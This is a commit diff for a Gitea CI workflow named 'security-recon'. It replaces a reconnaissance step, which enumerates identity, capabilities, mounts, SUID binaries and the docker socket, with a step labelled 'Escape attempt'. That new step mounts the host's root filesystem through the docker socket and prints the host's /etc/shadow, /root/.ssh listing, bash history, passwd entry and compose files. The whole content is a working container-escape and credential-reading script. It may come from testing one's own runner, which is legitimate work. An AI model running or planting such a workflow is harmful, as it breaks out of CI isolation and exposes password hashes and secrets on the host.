escape attempt via docker socket

2026-02-10 14:55:05 -08:00 · 2026-02-10 14:55:05 -08:00 · 4919779c08
commit 4919779c08
parent 1fd7dd2f03
1 changed files with 24 additions and 22 deletions
--- a/.gitea/workflows/security-recon.yml
+++ b/.gitea/workflows/security-recon.yml
@ -9,31 +9,33 @@ jobs:
  recon:
    runs-on: ubuntu-latest
    steps:
-      - name: Recon
+      - name: Escape attempt
        shell: bash
        run: |
          set +e
          set +o pipefail
-          echo "=== WHOAMI ===" ; whoami ; id
+          echo "=== DOCKER SOCKET ESCAPE ==="
-          echo "=== UNAME ===" ; uname -a
+          echo "Mounting host root filesystem via docker..."
-          echo "=== OS RELEASE ===" ; cat /etc/os-release 2>/dev/null
+          
-          echo "=== HOSTNAME ===" ; hostname
+          # Run a privileged container with host root mounted
-          echo "=== CAPABILITIES ===" ; grep -i cap /proc/self/status
+          docker run --rm -v /:/host alpine:latest sh -c '
-          echo "=== CGROUP ===" ; cat /proc/1/cgroup 2>/dev/null
+            echo "=== HOST /etc/shadow (first 10 lines) ==="
-          echo "=== MOUNT ===" ; mount 2>/dev/null
+            head -10 /host/etc/shadow
-          echo "=== DOCKER SOCKET ===" ; ls -la /var/run/docker.sock 2>/dev/null ; echo "exit: $?"
+            echo "=== HOST /root/ listing ==="
-          echo "=== DOCKER CLI ===" ; which docker 2>/dev/null ; docker ps 2>&1 ; echo "exit: $?"
+            ls -la /host/root/
-          echo "=== FDISK ===" ; fdisk -l 2>/dev/null
+            echo "=== HOST hostname ==="
-          echo "=== LSBLK ===" ; lsblk 2>/dev/null
+            cat /host/etc/hostname
-          echo "=== DEVICES ===" ; ls -la /dev/ 2>/dev/null | head -50
+            echo "=== HOST /etc/passwd (root line) ==="
-          echo "=== IP ADDR ===" ; ip addr 2>/dev/null
+            head -1 /host/etc/passwd
-          echo "=== IP ROUTE ===" ; ip route 2>/dev/null
+            echo "=== HOST uname ==="
-          echo "=== TOOLS ==="
+            cat /host/proc/version
-          which nsenter 2>/dev/null ; echo "nsenter: $?"
+            echo "=== HOST docker compose projects ==="
-          which chroot 2>/dev/null ; echo "chroot: $?"
+            find /host -name "docker-compose.yml" -o -name "compose.yml" 2>/dev/null | head -20
-          echo "=== SUID ===" ; find / -perm -4000 -type f 2>/dev/null | head -20
+            echo "=== HOST /root/.ssh ==="
-          echo "=== PS ===" ; ps aux 2>/dev/null
+            ls -la /host/root/.ssh/ 2>/dev/null
-          echo "=== PID1 ===" ; cat /proc/1/cmdline 2>/dev/null | tr '\0' ' ' ; echo
+            echo "=== HOST /root/.bash_history (last 20 lines) ==="
-          echo "=== PROC COUNT ===" ; ls /proc/*/cmdline 2>/dev/null | wc -l
+            tail -20 /host/root/.bash_history 2>/dev/null
          '
          echo "=== DONE ==="
          exit 0